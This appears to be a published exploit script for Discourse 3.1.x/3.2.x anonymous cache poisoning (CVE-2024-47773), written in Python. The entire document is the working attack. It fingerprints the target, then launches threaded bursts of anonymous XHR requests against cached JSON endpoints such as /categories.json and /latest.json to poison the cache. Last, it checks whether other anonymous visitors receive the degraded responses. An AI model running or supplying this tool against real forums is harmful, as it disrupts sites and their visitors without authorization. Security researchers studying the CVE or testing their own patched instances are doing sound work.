1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 |
#!/usr/bin/env python3 """ Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning Date: 2024-10-15 Exploit Author: ibrahimsql Github: : https://github.com/ibrahmsql Vendor Homepage: https://discourse.org Software Link: https://github.com/discourse/discourse Version: Discourse < latest (patched) Tested on: Discourse 3.1.x, 3.2.x CVE: CVE-2024-47773 CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L) Description: Discourse anonymous cache poisoning vulnerability allows attackers to poison the cache with responses without preloaded data through multiple XHR requests. This affects only anonymous visitors of the site. Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-47773 """ import requests import sys import argparse import time import threading import json from urllib.parse import urljoin class DiscourseCachePoisoning: def __init__(self, target_url, threads=10, timeout=10): self.target_url = target_url.rstrip('/') self.threads = threads self.timeout = timeout self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' }) self.poisoned = False def check_target(self): """Check if target is accessible and running Discourse""" try: response = self.session.get(f"{self.target_url}/", timeout=self.timeout) if response.status_code == 200: if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text: return True except Exception as e: print(f"[-] Error checking target: {e}") return False def check_anonymous_cache(self): """Check if anonymous cache is enabled""" try: # Test endpoint that should be cached for anonymous users response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout) # Check cache headers cache_headers = ['cache-control', 'etag', 'last-modified'] has_cache = any(header in response.headers for header in cache_headers) if has_cache: print("[+] Anonymous cache appears to be enabled") return True else: print("[-] Anonymous cache may be disabled") return False except Exception as e: print(f"[-] Error checking cache: {e}") return False def poison_cache_worker(self, endpoint): """Worker function for cache poisoning attempts""" try: # Create session without cookies to simulate anonymous user anon_session = requests.Session() anon_session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' }) # Make rapid requests to poison cache for i in range(50): response = anon_session.get( f"{self.target_url}{endpoint}", timeout=self.timeout ) # Check if response lacks preloaded data if response.status_code == 200: try: data = response.json() # Check for missing preloaded data indicators if self.is_poisoned_response(data): print(f"[+] Cache poisoning successful on {endpoint}") self.poisoned = True return True except: pass time.sleep(0.1) except Exception as e: pass return False def is_poisoned_response(self, data): """Check if response indicates successful cache poisoning""" # Look for indicators of missing preloaded data indicators = [ # Missing or empty preloaded data not data.get('preloaded', True), data.get('preloaded') == {}, # Missing expected fields 'categories' in data and not data['categories'], 'topics' in data and not data['topics'], # Error indicators data.get('error') is not None, data.get('errors') is not None ] return any(indicators) def test_cache_poisoning(self): """Test cache poisoning on multiple endpoints""" print("[*] Testing cache poisoning vulnerability...") # Target endpoints that are commonly cached endpoints = [ '/categories.json', '/latest.json', '/top.json', '/c/general.json', '/site.json', '/site/basic-info.json' ] threads = [] for endpoint in endpoints: print(f"[*] Testing endpoint: {endpoint}") # Create multiple threads to poison cache for i in range(self.threads): thread = threading.Thread( target=self.poison_cache_worker, args=(endpoint,) ) threads.append(thread) thread.start() # Wait for threads to complete for thread in threads: thread.join(timeout=5) if self.poisoned: break time.sleep(1) return self.poisoned def verify_poisoning(self): """Verify if cache poisoning was successful""" print("[*] Verifying cache poisoning...") # Test with fresh anonymous session verify_session = requests.Session() verify_session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }) try: response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout) if response.status_code == 200: try: data = response.json() if self.is_poisoned_response(data): print("[+] Cache poisoning verified - anonymous users affected") return True else: print("[-] Cache poisoning not verified") except: print("[-] Unable to parse response") else: print(f"[-] Unexpected response code: {response.status_code}") except Exception as e: print(f"[-] Error verifying poisoning: {e}") return False def exploit(self): """Main exploit function""" print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)") print(f"[*] Target: {self.target_url}") if not self.check_target(): print("[-] Target is not accessible or not running Discourse") return False print("[+] Target confirmed as Discourse instance") if not self.check_anonymous_cache(): print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)") print("[*] Continuing with exploit attempt...") success = self.test_cache_poisoning() if success: print("[+] Cache poisoning attack successful!") self.verify_poisoning() print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data") print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE") return True else: print("[-] Cache poisoning attack failed") print("[*] Target may be patched or cache disabled") return False def main(): parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)') parser.add_argument('-u', '--url', required=True, help='Target Discourse URL') parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)') parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)') args = parser.parse_args() exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout) try: success = exploit.exploit() sys.exit(0 if success else 1) except KeyboardInterrupt: print("\n[-] Exploit interrupted by user") sys.exit(1) except Exception as e: print(f"[-] Exploit failed: {e}") sys.exit(1) if __name__ == '__main__': main() |